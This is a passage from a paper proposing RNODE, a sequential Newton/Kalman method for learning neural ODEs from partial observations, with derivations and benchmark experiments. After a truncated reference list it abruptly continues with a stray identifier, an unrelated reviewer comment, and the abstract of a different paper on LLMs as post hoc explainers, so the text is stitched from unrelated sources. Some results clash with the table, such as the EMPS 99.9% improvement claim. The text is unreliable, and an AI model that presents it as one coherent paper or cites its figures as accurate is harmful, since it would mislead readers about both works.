If, under a control input \( u(t) \), \( h(x(t_a)) = h(x(t_b)) \), then the state estimator cannot identify the true state \( x \), since it can assume the true state to be \( x(t_a) \) when it is \( x(t_b) \) and vice versa. Since our procedure relies on finding the latent states \( x(t) \) given a control input \( u(t) \) and observation \( y(t) \), and uses them to identify the ODE system by estimating the model parameters \( \theta(t) \), estimating the wrong state \( x(t) \) will result in wrong model parameters, and hence training will fail. A way to impose state distinguishability is to incorporate prior knowledge regarding the relationship between states, focusing on achieving the properties stated in Definition 3.1.

3.3 GENERATIVE MODEL

In the continuous model presented in (1), a continuous-time description of the latent processes is assumed even though the observations are recorded at discrete time points.
The time evolution of the states \( x(t) \) can therefore be expressed as time integration of (1) using an off-the-shelf ODE solver:
\[
x(t_i) = x(t_{i-1}) + \int_{t_{i-1}}^{t_i} f(x(t), u(t), \theta(t)) \, dt + \int_{t_{i-1}}^{t_i} \frac{\partial \epsilon(t)}{\partial t} \, dt = \text{ODESolve}(f, x(t_{i-1}), u(t_{i-1}), \theta(t_{i-1}), t_{i-1}, t_i) + \epsilon(t).
\]
We define
\[
f_o(x(t_{i-1}), u(t_{i-1}), \theta(t_{i-1})) = \text{ODESolve}(f, x(t_{i-1}), u(t_{i-1}), \theta(t_{i-1}), t_{i-1}, t_i)
\]
and
\[
g_o(\theta(t_{i-1})) = \text{ODESolve}(g, \theta(t_{i-1}), t_{i-1}, t_i).
\]
Based on the continuous model presented in (1), we present the time evolution of the latent states through the following generative model:
\[
\begin{align*}
\theta(t_i) &= g_o(\theta(t_{i-1})) + \nu(t) \\
x(t_i) &= f_o(x(t_{i-1}), u(t_{i-1}), \theta(t_{i-1})) + \epsilon(t) \\
y(t_i) &= h(x(t_i)) + \zeta(t).
\end{align*}
\]

Figure 1: The generative model (left panel), and one step of RNODE (right panel).

4 Method

Recursive Neural Ordinary Differential Equations (RNODE) finds the model parameters \( \theta(t) \) and latent states \( x(t) \) given a dataset \( \mathcal{D} \triangleq \{u(t_0), y(t_0), \ldots, u(t_{N-1}), y(t_{N-1})\} \) of discrete observations and control inputs when \( x(t) \) is partially observed. Inspired by previous work describing the link between the second-order Newton's method and the Kalman filter (Humpherys et al., 2012), the cost function \( L \) is updated and minimized sequentially to find the latent states \( x(t) \) and model parameters \( \theta(t) \) in one unified framework. RNODE assumes model distinguishability, which implies that the latent states \( x(t) \) are recoverable from the observations \( y(t) \). In this context, we break the optimization into two steps, concerning optimization with respect to \( x(t) \) and \( \theta(t) \).

4.1 Sequential Newton Derivation

We denote by \( \Theta_N = [\theta(t_0), \ldots, \theta(t_N)] \) and \( X_N = [x(t_0), \ldots, x(t_N)] \) the parameters and latent states sampled at \( t_0, t_1, \ldots, t_N \). To train the model, we optimize \( (\Theta_N, X_N) \) to minimize a quadratic cost function starting from initial \( \{x(t_0), \theta(t_0)\} \), using a collection of combined observation and input sequences \( \mathcal{D} \), where the cost function is defined as:
\[
L_N(\Theta_N, X_N) = \frac{1}{2} \sum_{i=1}^{N} \Big[ \|x(t_i) - f_o(x(t_{i-1}), u(t_{i-1}), \theta(t_{i-1}))\|_{Q_x^{-1}}^2 + \|y(t_i) - h(x(t_i))\|_{R_y^{-1}}^2 + \|\theta(t_i) - g_o(\theta(t_{i-1}))\|_{Q_\theta^{-1}}^2 \Big] \quad (7)
\]
where \( Q_x \), \( R_y \), and \( Q_\theta \) are known positive definite matrices, and \( \|a - b\|_{A^{-1}}^2 = (a - b)^\top A^{-1}(a - b) \). As the Hessian's inverse is in general intractable, finding the optimal solution \( (\Theta_N^*, X_N^*) \) using the second-order Newton method over the whole dataset of size \( N \) is infeasible. For this reason, we resort to a sequential strategy by introducing a modified quadratic function \( L_i(\Theta_i, X_i) \). Let us re-write the cost function at time \( t_i \) as:
$$L_i(\Theta_i, X_i) = L_{i-1}(\Theta_{i-1}, X_{i-1}) + \frac{1}{2} \|x(t_i) - f_o(x(t_{i-1}), u(t_{i-1}), \theta(t_{i-1}))\|^2_{Q_x^{-1}} + \frac{1}{2} \|y(t_i) - h(x(t_i))\|^2_{R_y^{-1}} + \frac{1}{2} \|\theta(t_i) - g_o(\theta(t_{i-1}))\|^2_{Q_\theta^{-1}} \quad (8)$$
where $L_{i-1}(\Theta_{i-1}, X_{i-1})$ and $L_i(\Theta_i, X_i)$ are the cost functions at times $t_{i-1}$ and $t_i$, respectively; $\Theta_i = [\theta(t_0), \ldots, \theta(t_i)]$ and $X_i = [x(t_0), \ldots, x(t_i)]$.
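For concreteness, the following is a minimal NumPy sketch — not the authors' implementation — of evaluating the batch cost in (7). The callables `f_o`, `g_o`, and `h` and the inverse weight matrices are assumed to be supplied by the caller, and the 1/2 factor is applied to every term as in (8).

```python
import numpy as np

def quad(r, W_inv):
    """Quadratic form ||r||^2_{W^{-1}} = r^T W^{-1} r."""
    return float(r @ W_inv @ r)

def cost_L_N(X, Theta, U, Y, f_o, g_o, h, Qx_inv, Ry_inv, Qth_inv):
    """Evaluate the batch objective L_N of Eq. (7) along a trajectory.

    X:     (N+1, d_x)  latent states x(t_0), ..., x(t_N)
    Theta: (N+1, d_th) parameters theta(t_0), ..., theta(t_N)
    U:     (N, d_u)    control inputs u(t_0), ..., u(t_{N-1})
    Y:     (N, d_y)    observations y(t_1), ..., y(t_N)
    """
    L = 0.0
    for i in range(1, X.shape[0]):
        # State-transition, observation, and parameter-transition residuals
        L += 0.5 * quad(X[i] - f_o(X[i - 1], U[i - 1], Theta[i - 1]), Qx_inv)
        L += 0.5 * quad(Y[i - 1] - h(X[i]), Ry_inv)
        L += 0.5 * quad(Theta[i] - g_o(Theta[i - 1]), Qth_inv)
    return L
```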
In the sequential optimization paradigm, $\Theta_{i-1}$ and $X_{i-1}$ are assumed known, and the $i$-th optimization step is performed only with respect to $\{\theta(t_i), x(t_i)\}$. When $\{\theta(t_i), x(t_i)\}$ are determined jointly, such as in (Humpherys et al., 2012), the optimization process will suffer from vanishing gradients under partial observations. However, if $x(t_i)$ is distinguishable, we can circumvent the vanishing gradient problem by first optimizing with respect to $x(t_i)$ and then $\theta(t_i)$. This allows us to circumvent the partial observability problem and enables the use of an estimate of the unobserved state in training. To do so, we break the optimization function (8) into four alternating optimization procedures aiming at finding $\hat{x}(t_i)$ and then finding the $\hat{\theta}(t_i)$ that minimizes (8) given $\hat{x}(t_i)$.

Let us begin by defining two intermediate optimization functions $L_{i|i-1}^x$ and $L_{i|i-1}^\theta$ in (9) and (10), respectively, as follows:
$$L_{i|i-1}^x(\Theta_i, X_i) = L_{i-1}(\Theta_{i-1}, X_{i-1}) + \frac{1}{2} \|x(t_i) - f_o(x(t_{i-1}), u(t_{i-1}), \theta(t_{i-1}))\|^2_{Q_x^{-1}} + \frac{1}{2} \|\theta(t_i) - g_o(\theta(t_{i-1}))\|^2_{Q_\theta^{-1}} \quad (9)$$
and
$$L_{i|i-1}^\theta(\Theta_i, X_i) = L_{i-1}(\Theta_{i-1}, X_{i-1}) + \frac{1}{2} \|\theta(t_i) - g_o(\theta(t_{i-1}))\|^2_{Q_\theta^{-1}}. \quad (10)$$
We proceed by optimizing (9) for $x(t_i)$ and (10) for $\theta(t_i)$, yielding the respective solutions below:
$$\hat{\theta}(t_i|t_{i-1}) = g_o(\hat{\theta}(t_{i-1}))$$
$$\hat{x}(t_i|t_{i-1}) = f_o(\hat{x}(t_{i-1}), u(t_{i-1}), \hat{\theta}(t_{i-1})). \quad (11)$$
Next, we define the two optimization functions responsible for the update steps for states and parameters. Specifically, we define $L_i^x$ as:
$$L_i^x(\Theta_i, X_i) = L_{i|i-1}^x(\Theta_i, X_i) + \|y(t_i) - h(x(t_i))\|^2_{R_y^{-1}} \quad (12)$$
to be optimized with respect to $x(t_i)$ by minimizing $L_i^x$ given the intermediate values of equation (11), where:
$$\hat{x}(t_i) = \hat{x}(t_i|t_{i-1}) - \left[(\nabla^2 L_i^x(\Theta_i, X_i))^{-1}\right]_{i,:} \nabla L_i^x(\Theta_i, X_i). \quad (13)$$
The solution to the problem above is given by (16). Equivalently, we define the update optimization function $L_i^\theta$ as:
$$L_i^\theta(\Theta_i, X_i) = L_{i|i-1}^\theta(\Theta_i, X_{i-1}) + \|x(t_i) - f_o(x(t_{i-1}), u(t_{i-1}), \theta(t_{i-1}))\|^2_{Q_x^{-1}} + \|y(t_i) - h(x(t_i))\|^2_{R_y^{-1}} \quad (14)$$
to be optimized with respect to $\theta(t_i)$ by minimizing $L_i^\theta$ given the intermediate values of equations (11) and (16), as follows:
$$\hat{\theta}(t_i) = \hat{\theta}(t_i|t_{i-1}) - \left[(\nabla^2 L_i^\theta(\Theta_i, X_{i-1}))^{-1}\right]_{i,:} \nabla L_i^\theta(\Theta_i, X_{i-1}). \quad (15)$$
The resulting optimal variable $\hat{\theta}(t_i)$ is given by (17). The procedure is repeated until $t_i = t_N$.
We present our main result in the following theorem:

Theorem 4.1 Given \( \hat{\theta}(t_{i-1}) \in \hat{\Theta}_{i-1} \) and \( \hat{x}(t_{i-1}) \in \hat{X}_{i-1} \), and known \( P_{\theta_{i-1}} \in \mathbb{R}^{d_\theta \times d_\theta} \) and \( P_{x_{i-1}} \in \mathbb{R}^{d_x \times d_x} \), the recursive equations for computing \( \hat{x}(t_i) \) and \( \hat{\theta}(t_i) \) that minimize \( \mathcal{L}_i \) are given by the following:
\[
\hat{x}(t_i) = f_o(\hat{x}(t_{i-1}), u(t_{i-1}), \hat{\theta}(t_{i-1})) - \bar{P}_{x_i} H_i^\top (H_i \bar{P}_{x_i} H_i^\top + R_y)^{-1} \left[ h\big(f_o(\hat{x}(t_{i-1}), u(t_{i-1}), \hat{\theta}(t_{i-1}))\big) - y(t_i) \right] \quad (16)
\]
\[
\hat{\theta}(t_i) = g_o(\hat{\theta}(t_{i-1})) - G_{\theta_{i-1}} \bar{P}_{\theta_i} F_{\theta_{i-1}}^\top \left[ f_o(\hat{x}(t_{i-1}), u(t_{i-1}), \hat{\theta}(t_{i-1})) - \hat{x}(t_i) \right] \quad (17)
\]
with \( \bar{P}_{\theta_i} \) and \( \bar{P}_{x_i} \) being intermediate matrices, and \( P_{\theta_i} \) and \( P_{x_i} \) being the lower right blocks of \( (\nabla^2 \mathcal{L}_i^\theta)^{-1} \) and \( (\nabla^2 \mathcal{L}_i^x)^{-1} \), respectively:
\[
\bar{P}_{\theta_i} = P_{\theta_{i-1}} - P_{\theta_{i-1}} F_{\theta_{i-1}}^\top \left( Q_x + F_{\theta_{i-1}} P_{\theta_{i-1}} F_{\theta_{i-1}}^\top \right)^{-1} F_{\theta_{i-1}} P_{\theta_{i-1}}
\]
\[
\bar{P}_{x_i} = F_{x_{i-1}} P_{x_{i-1}} F_{x_{i-1}}^\top + Q_x
\]
\[
P_{x_i} = \bar{P}_{x_i} \left[ I - H_i^\top \left( R_y + H_i \bar{P}_{x_i} H_i^\top \right)^{-1} H_i \bar{P}_{x_i} \right]
\]
\[
P_{\theta_i} = Q_\theta + G_{\theta_{i-1}} \bar{P}_{\theta_i} G_{\theta_{i-1}}^\top
\]
with \( H_i \), \( F_{x_{i-1}} \), \( F_{\theta_{i-1}} \), and \( G_{\theta_{i-1}} \) being the Jacobians of the vector fields \( h \), \( f_o \), and \( g_o \) evaluated at \( \hat{x}(t_i|t_{i-1}) \), \( \hat{x}(t_{i-1}) \), and \( \hat{\theta}(t_{i-1}) \):
\[
H_i = \frac{\partial h(\hat{x}(t_i|t_{i-1}))}{\partial \hat{x}(t_i|t_{i-1})}, \quad F_{x_{i-1}} = \frac{\partial f_o(\hat{x}(t_{i-1}), u(t_{i-1}), \hat{\theta}(t_{i-1}))}{\partial \hat{x}(t_{i-1})}, \quad F_{\theta_{i-1}} = \frac{\partial f_o(\hat{x}(t_{i-1}), u(t_{i-1}), \hat{\theta}(t_{i-1}))}{\partial \hat{\theta}(t_{i-1})},
\]
and \( G_{\theta_{i-1}} = \frac{\partial g_o(\hat{\theta}(t_{i-1}))}{\partial \hat{\theta}(t_{i-1})} \).

The proof of Theorem 4.1 is provided in Appendix A. As a consequence of Theorem 4.1, \( \hat{x}(t_i) \) is computed according to (16) using \( \hat{\theta}(t_{i-1}) \); \( \hat{\theta}(t_i) \) is computed afterwards according to (17) using the \( \hat{x}(t_i) \) previously found in (16). This alternating procedure between \( x(t_i) \) and \( \theta(t_i) \) is illustrated in the right panel of Figure 1, which depicts the four alternating optimization steps performed at each iteration \( t_i \).

The computational complexity of RNODE is detailed in Appendix D. An epoch of RNODE has a complexity of \( O(N(d_\theta^3 + 2d_\theta^2 d_x + 2d_\theta d_x^2)) \). Under the assumption that \( d_\theta \gg d_x \), the complexity becomes \( O(N(2d_\theta^2 d_x + 2d_\theta d_x^2)) \). During testing, however, the complexity becomes \( O(d_\theta) \) per step if integrating the learned mean vector field.

4.2 Obtaining initial conditions from historical data

Obtaining the initial condition \( x(t_0) \) at test time is often challenging. However, the proposed recursive framework can easily provide an estimate of the initial condition if historical data \( \mathcal{D}_H \triangleq \{u(t_{-N}), y(t_{-N}), \ldots, u(t_0), y(t_0)\} \) is available, as described in equation 58 in Appendix C. Thus, given the model \( \theta^* \), we can exploit the update equation for the states, see (16), to provide \( \hat{x}(t_0) \).
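For concreteness, one alternating predict/update iteration of RNODE can be sketched in NumPy as below. This is a minimal illustration of the recursions in Theorem 4.1 — not the authors' implementation: the model callables (`f_o`, `g_o`, `h`) and their Jacobians are assumed to be supplied by the user, and the bookkeeping deferred to Appendix A (which we do not have) is omitted.

```python
import numpy as np

def rnode_step(x_hat, th_hat, u, y, P_x, P_th,
               f_o, g_o, h, jac_f_x, jac_f_th, jac_g_th, jac_h,
               Q_x, Q_th, R_y):
    """One RNODE iteration: predict (Eq. 11), state update (Eq. 16),
    then parameter update (Eq. 17) using the corrected state."""
    # Jacobians of f_o and g_o at the previous estimates
    F_x = jac_f_x(x_hat, u, th_hat)
    F_th = jac_f_th(x_hat, u, th_hat)
    G_th = jac_g_th(th_hat)

    # Prediction step (Eq. 11)
    x_bar = f_o(x_hat, u, th_hat)
    th_bar = g_o(th_hat)

    # State update (Eq. 16) with the predicted covariance block
    Pbar_x = F_x @ P_x @ F_x.T + Q_x
    H = jac_h(x_bar)
    S = H @ Pbar_x @ H.T + R_y
    K = Pbar_x @ H.T @ np.linalg.inv(S)
    x_new = x_bar - K @ (h(x_bar) - y)
    P_x_new = Pbar_x - K @ H @ Pbar_x

    # Parameter update (Eq. 17) using the freshly corrected state x_new
    M = np.linalg.inv(Q_x + F_th @ P_th @ F_th.T)
    Pbar_th = P_th - P_th @ F_th.T @ M @ F_th @ P_th
    th_new = th_bar - G_th @ Pbar_th @ F_th.T @ (x_bar - x_new)
    P_th_new = Q_th + G_th @ Pbar_th @ G_th.T

    return x_new, th_new, P_x_new, P_th_new
```

Iterating this function over the dataset from $t_1$ to $t_N$ reproduces one training epoch of the sequential procedure described above.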
5 Experiments

The performance of RNODE is assessed in comparison to state-of-the-art model learning methods on several challenging nonlinear simulations and real-world datasets. We employed five different dynamical models to demonstrate the effectiveness of the proposed approach. For each dynamical model, we assume that parts of the governing dynamics are unavailable and replace them with a neural network. In all of our experiments, we assume the latent parameter process to be constant, that is, \( g(\theta(t)) = 0 \), since the optimal \( \theta^*(t) \) should be constant. An Euler integrator is used as the ODE solver for efficiency and fast computation. Since the proposed mechanism rests on determining unobserved latent states from observed measurements, successful learning of the model relies on the distinguishability of latent states as defined in Definition 3.1. To ensure this, we assume partial knowledge of the system's ODEs.

As benchmark methods, we compared RNODE with three other well-established techniques for dynamical machine learning, namely NODE (Chen et al., 2018), RM (Buisson-Fenet et al., 2022), and PR-SSM (Doerr et al., 2018). Currently, no code is available for the model learning frameworks presented in (Eleftheriadis et al., 2017). Moreover, the available code related to the works in (McHutchon et al., 2015; Ialongo et al., 2019) could be modified to account for the partial observation scenario; however, these algorithms become computationally infeasible for medium and large datasets (Doerr et al., 2018). For that reason, we were not able to benchmark against these approaches. We emphasize that modifying the above-mentioned methods to either account for the ODE structure or make them computationally tractable is out of the scope of this paper. This also applies to the PR-SSM method. Nevertheless, for the sake of providing comparative results, we still include results using PR-SSM, which is computationally more efficient than other Gaussian-process-based models but does not account for the ODE structure.

The benchmark results are summarized in Table 1, which reports normalized root mean square error (nRMSE) values for each model and method. In Figs. 2–5, we compare RM, PR-SSM, and our proposed method. All results were obtained with the learned mean vector field integrated over time. Each subfigure represents the dynamics of a single state and contains the ODE solutions for each method. We computed the nRMSE as \( \text{nRMSE} = \frac{\sqrt{\sum_{i=1}^{n}(x(t_i) - \hat{x}(t_i))^2}}{\max(x(t)) - \min(x(t))} \), where \( \hat{x}(t_i) \) and \( x(t_i) \) are the estimated and true states at time \( t_i \), respectively, and \( n \) is the number of data points.

Table 1: Comparison of nRMSE values for different dynamical models and methods.
| Methods | Neuron model | Yeast Glycolysis | Cart-pole | Harmonic Oscillator | EMPS |
|---|---|---|---|---|---|
| RM (Buisson-Fenet et al., 2022) | $2.39 \cdot 10^{-1}$ | $6.30 \cdot 10^{-1}$ | $1.06 \cdot 10^{0}$ | $2.36 \cdot 10^{-2}$ | $6.20 \cdot 10^{-1}$ |
| PR-SSM (Doerr et al., 2018) | $4.05 \cdot 10^{-1}$ | $1.59 \cdot 10^{0}$ | $1.52 \cdot 10^{0}$ | $1.21 \cdot 10^{0}$ | $4.05 \cdot 10^{-1}$ |
| NODE (Chen et al., 2018) | $7.03 \cdot 10^{1}$ | $3.74 \cdot 10^{-1}$ | $2.84 \cdot 10^{-1}$ | $4.65 \cdot 10^{-1}$ | $1.65 \cdot 10^{0}$ |
| RNODE (Proposed) | $1.54 \cdot 10^{-1}$ | $3.39 \cdot 10^{-2}$ | $9.41 \cdot 10^{-3}$ | $5.08 \cdot 10^{-3}$ | $9.50 \cdot 10^{-2}$ |

5.1 Hodgkin–Huxley Neuron Model

The renowned Hodgkin–Huxley neuron model (HH) (Hodgkin & Huxley, 1952) is an ODE system that describes the membrane dynamics of action potentials in neurons, which are electrical signals used by neurons to communicate with each other. The model has four states: \( V_m \) is the membrane potential, and \( n_{gate} \), \( m_{gate} \), and \( h_{gate} \) are gating variables controlling the membrane's ionic permeability. The equations governing the ODE system are provided in Eqs. 46–49 of Appendix B.2.

We train our recursive model under the assumption that Eq. 49, governing the dynamics of \( h_{gate} \), is unknown and that its corresponding state is not observed, i.e., \( y(t_i) = (V_m(t_i), n_{gate}(t_i), m_{gate}(t_i)) \). We replace the dynamics describing \( h_{gate}(t) \) with a neural network consisting of three layers. The first layer has 20 units followed by an exponential linear unit (ELU) activation function; the second layer also has 20 units, followed by a tanh activation function; the last layer consists of 10 units with a sigmoid activation function.

We generate our dataset by applying a constant control input \( u(t_i) \) to the HH model described in Eqs. 46–49 for 50000 time steps with \( dt = 10^{-3}s \) and by collecting measurements and inputs \( \mathcal{D} \triangleq \{u(t_0), y(t_0), \ldots, u(t_{N-1}), y(t_{N-1})\} \). We train our model on \( \mathcal{D} \) with \( P_{x_0} = 10^{-2}I_{d_x}, P_{\theta_0} = 10^2I_{d_\theta}, R_y = 10^{-10}I_{d_y}, Q_x = 10^{-5}I_{d_x} \), and \( Q_\theta = 10^{-2}I_{d_\theta} \). At the beginning of each epoch, we solve problem (58) of Appendix C to get the initial condition. The final optimal parameters \( \hat{\theta}(t_N) \) and initial condition \( \hat{x}(t_0) \) are saved at the end of training.

Fig. 2 depicts the dynamics of the system generated with $\hat{\theta}(t_N)$ according to the generative model described in Eq. (3), starting from the initial condition $\hat{x}(t_0)$. The lower right panel demonstrates the superiority of the proposed model at learning $h_{gate}$. To demonstrate the robustness of RNODE to different dynamical regimes and showcase its capability of estimating accurate initial conditions, we perform an additional experiment. For this, we generate data $D_T$ with $N = 50,000$ samples using the HH model with initial conditions different from the ones used during training. From this data, we reserve the first 100 samples for learning the initial condition before performing integration for the remaining 49,900 samples. Then, using the learned model $\hat{\theta}(t_N)$ and the procedure described in Section 4.2, we estimated the initial condition $\hat{x}(t_{100})$ and obtained the RNODE solution.
Figure 3 shows the evolution of the RNODE solution, attesting to its capability of both estimating accurate initial conditions and generalizing to other dynamical regimes.

### 5.2 Cart-Pole System

We demonstrate the efficacy of the proposed RNODE in learning the nonlinear dynamics of the cart-pole system. The system is composed of a cart running on a track, with a freely swinging pendulum attached to it. The state of the system consists of the cart's position and velocity and the pendulum's angle and angular velocity, while a control input $u$ can be applied to the cart. We used the LQR (Prasad et al., 2011) algorithm to learn a feedback controller that swings the pendulum up and balances it in the inverted position in the middle of the track. The equations governing the ODE system are provided in Eqs. (54)-(57) of Appendix B.5.

We train our recursive model under the assumption that the equation for $\dot{\phi}$, governing the dynamics of the cart-pole's angular rate, is unknown. Therefore, we replace Eqs. (55) and (57) with a two-layer neural network with a tanh activation function on each layer. We do not measure the cart-pole's velocity $\dot{z}(t_i)$ and angular rate $\dot{\phi}(t_i)$, i.e., $y(t_i) = [z(t_i), \phi(t_i)]$.

We generate our dataset by applying the LQR balancing controller to the cart-pole described in Eqs. (54)-(57) for 5000 time steps with $dt = 10^{-3}s$ and by collecting measurements and inputs $D \triangleq \{u(t_0), y(t_0), \ldots, u(t_{N-1}), y(t_{N-1})\}$. We train our model on $D$ with $P_{x_0} = 10^{-2}I_{d_x}, P_{\theta_0} = 10^2I_{d_\theta}, R_y = 10^{-10}I_{d_y}, Q_x = 10^{-5}I_{d_x}$, and $Q_\theta = 10^{-2}I_{d_\theta}$. At the beginning of each epoch, we solve problem (58) of Appendix C to get the initial condition. The final optimal parameters $\hat{\theta}(t_N)$ and initial condition $\hat{x}(t_0)$ are saved at the end of training.

We qualitatively assess the performance of our model by feeding the control sequence stored in $D$ and the parameters $\hat{\theta}(t_N)$ to the RNODE according to the generative model described in Eq. (3), starting from the initial condition $\hat{x}(t_0)$. In Figure 4, we demonstrate the ability of the proposed RNODE to learn the underlying dynamics of the system from partially observed data, compared to the RM and PR-SSM methods. Table 1 shows that RNODE clearly outperforms the competing algorithms, with an nRMSE value that is 99.3%, 99.1%, and 97.67% smaller than the nRMSEs obtained by PR-SSM, RM, and NODE, respectively. Analyzing the evolution of the latent states depicted in Figure 4, we notice that RNODE provides state trajectories that match the ground truth (GT), while the other two methods fail to capture the true trajectory. In fact, PR-SSM presents acceptable trajectories of $z$ and $\dot{z}$ but fails to learn the $\phi$ and $\dot{\phi}$ trajectories. On the other hand, RM presents acceptable trajectories of $\phi$ and $\dot{\phi}$ but fails to learn the $z$ and $\dot{z}$ trajectories. Moreover, NODE successfully learns the observed $\phi$ and $z$ trajectories but fails to learn correct trajectories of the unobserved states $\dot{\phi}$ and $\dot{z}$. Both the RM and PR-SSM estimated state trajectories are much less accurate than the one provided by RNODE.
The main reason for this inaccuracy is that trajectory generation is run using a pre-computed control sequence $U \triangleq \{u(t_0), \ldots, u(t_{N-1})\} \in D$; hence, any inaccuracy in the learned dynamics causes the trajectories to deviate far from the ground truth (GT) due to the nonlinearity of the cart-pole system. This demonstrates the challenging nature of the problem and the proposed approach's effectiveness in learning challenging nonlinear dynamics. In this context, RNODE's superior performance is due to its alternating optimization approach, since estimates of the unobserved states become available when optimizing $\theta$. This feature is unavailable in the competing methods.

5.3 ELECTRO-MECHANICAL POSITIONING SYSTEM

Here we evaluate the proposed RNODE on real data from an electro-mechanical positioning system described in (Janot et al., 2019). The training dataset consists of the system's position, velocity, and the control inputs used. The dataset consists of 24801 data points for each state and control input with $dt = 10^{-3}s$. In a similar fashion to the HH and cart-pole systems, we train the RNODE using position and control inputs. We replace the velocity's dynamics with a neural network of two layers of 50 and 20 units, respectively, followed by a tanh activation function.

Table 1 shows that RNODE clearly outperforms the competing algorithms, with an nRMSE value that is 99.9%, 84.6%, and 94.2% smaller than the nRMSEs obtained by PR-SSM, RM, and NODE, respectively. Analyzing the evolution of the latent states depicted in Figure 5, we notice that RNODE provides state trajectories that match the ground truth (GT), while PR-SSM and RM collapse catastrophically. NODE learns the period of the hidden $\dot{q}_m$ signal but fails to capture its amplitude. The stiffness of the $\dot{q}_m$ dynamics plays a role in these results, since the sudden jumps shown in Figure 5 are hard to capture. This again demonstrates the robustness of the proposed approach.

6 CONCLUSIONS

We proposed a novel recursive learning mechanism for NODEs to address the challenging task of learning the complex dynamics of ODE systems with partial observations. Specifically, we constructed an alternating optimization procedure using Newton's method that sequentially finds optimal system latent states and model parameters. The resulting framework, RNODE, allows for efficient learning of missing ODEs when latent states are distinguishable. Different from other competing methods, RNODE optimizes model parameters using latent states instead of observed data, leading to superior performance under the partial observation setting. Experiments performed with three complex synthetic systems and one real dataset provide evidence that RNODE is capable of providing adequate solutions in very challenging scenarios, attesting to RNODE's superior performance when compared with other state-of-the-art strategies.

REFERENCES

Rohan Anil, Vineet Gupta, Tomer Koren, Kevin Regan, and Yoram Singer. Scalable second order optimization for deep learning. *arXiv preprint arXiv:2002.09018*, 2020.

Joseph Bakarji, Kathleen Champion, J Nathan Kutz, and Steven L Brunton. Discovering governing equations from partial measurements with deep delay autoencoders. *arXiv preprint arXiv:2201.05136*, 2022.

Joseph Bakarji, Kathleen Champion, J Nathan Kutz, and Steven L Brunton. Discovering governing equations from partial measurements with deep delay autoencoders. *Proceedings of the Royal Society A*, 479(2276):20230422, 2023.

Bradley M Bell.
The iterated Kalman smoother as a Gauss–Newton method. *SIAM Journal on Optimization*, 4(3):626–636, 1994.

Dimitri P Bertsekas. Incremental least squares methods and the extended Kalman filter. *SIAM Journal on Optimization*, 6(3):807–822, 1996.

VG Boltyanskiy, Revaz V Gamkrelidze, YEF Mishchenko, and LS Pontryagin. Mathematical theory of optimal processes. 1962.

Aleksandar Botev, Hippolyt Ritter, and David Barber. Practical Gauss-Newton optimisation for deep learning. In *International Conference on Machine Learning*, pp. 557–565. PMLR, 2017.

Mona Buisson-Fenet, Valery Morgenthaler, Sebastian Trimpe, and Florent Di Meglio. Recognition models to learn dynamics from partial observations with neural ODEs. *Transactions on Machine Learning Research*, 2022.

Richard H Byrd, Samantha L Hansen, Jorge Nocedal, and Yoram Singer. A stochastic quasi-Newton method for large-scale optimization. *SIAM Journal on Optimization*, 26(2):1008–1031, 2016.

Ricky TQ Chen, Yulia Rubanova, Jesse Bettencourt, and David K Duvenaud. Neural ordinary differential equations. *Advances in Neural Information Processing Systems*, 31, 2018.

Edward De Brouwer, Jaak Simm, Adam Arany, and Yves Moreau. GRU-ODE-Bayes: Continuous modeling of sporadically-observed time series. *Advances in Neural Information Processing Systems*, 32, 2019.

Ahmet Demirkaya, Tales Imbiriba, Kyle Lockwood, Sumientra Rampersad, Elie Alhajjar, Giovanna Guidoboni, Zachary Danziger, and Deniz Erdogmus. Cubature Kalman filter based training of hybrid differential equation recurrent neural network physiological dynamic models. *43rd Annual International Conference of the IEEE Engineering in Medicine and Biology Society*, 2021.

Andreas Doerr, Christian Daniel, Martin Schiegg, Duy Nguyen-Tuong, Stefan Schaal, Marc Toussaint, and Sebastian Trimpe. Probabilistic recurrent state-space models. In *International Conference on Machine Learning*, pp. 1280–1289. PMLR, 2018.

John Duchi, Elad Hazan, and Yoram Singer. Adaptive subgradient methods for online learning and stochastic optimization. *Journal of Machine Learning Research*, 12(7), 2011.

Stefanos Eleftheriadis, Tom Nicholson, Marc Deisenroth, and James Hensman. Identification of Gaussian process state space models. *Advances in Neural Information Processing Systems*, 30, 2017.

Paul Ghanem, Yunus Bicer, Deniz Erdogmus, and Alireza Ramezani. Efficient modeling of morphing wing flight using neural networks and cubature rules. *arXiv preprint arXiv:2110.01057*, 2021.

Donald Goldfarb, Yi Ren, and Achraf Bahamou. Practical quasi-Newton methods for training deep neural networks. *Advances in Neural Information Processing Systems*, 33:2386–2396, 2020.

Robert Gower, Donald Goldfarb, and Peter Richtárik. Stochastic block BFGS: Squeezing more curvature out of data. In *International Conference on Machine Learning*, pp. 1869–1878. PMLR, 2016.
MOtZlKkvdz
I’m slightly confused about the insights we can draw from the experiments. Specifically, the authors propose 3 different explanation strategies that seem to perform reasonably similarly. I understand the overall message that LLMs have the potential to be used as explainers. However, the confusing part to me is there are 3 algorithms presented, and it’s hard to understand which one is better or when. I’d appreciate it if the authors could provide a concise discussion around this.
Are Large Language Models Post Hoc Explainers?

Anonymous authors
Paper under double-blind review

Abstract

Large Language Models (LLMs) are increasingly used as powerful tools for a plethora of natural language processing (NLP) applications. A recent innovation, in-context learning (ICL), enables LLMs to learn new tasks by supplying a few examples in the prompt during inference time, thereby eliminating the need for model fine-tuning. While LLMs have been utilized in several applications, their applicability in explaining the behavior of other models remains relatively unexplored. Despite the growing number of new explanation techniques, many require white-box access to the model and/or are computationally expensive, highlighting a need for next-generation post hoc explainers. In this work, we present the first framework to study the effectiveness of LLMs in explaining other predictive models. More specifically, we propose a novel framework encompassing multiple prompting strategies: i) Perturbation-based ICL, ii) Prediction-based ICL, iii) Instruction-based ICL, and iv) Explanation-based ICL, with varying levels of information about the underlying ML model and the local neighborhood of the test sample. We conduct extensive experiments with real-world benchmark datasets to demonstrate that LLM-generated explanations perform on par with state-of-the-art post hoc explainers, leveraging the LLMs' ability to use ICL examples and their internal knowledge in generating model explanations. On average, across four datasets and two ML models, we observe that LLMs identify the most important feature with 72.19% accuracy, indicating promising avenues for further research into LLM-based explanation frameworks within explainable artificial intelligence (XAI).

1 Introduction

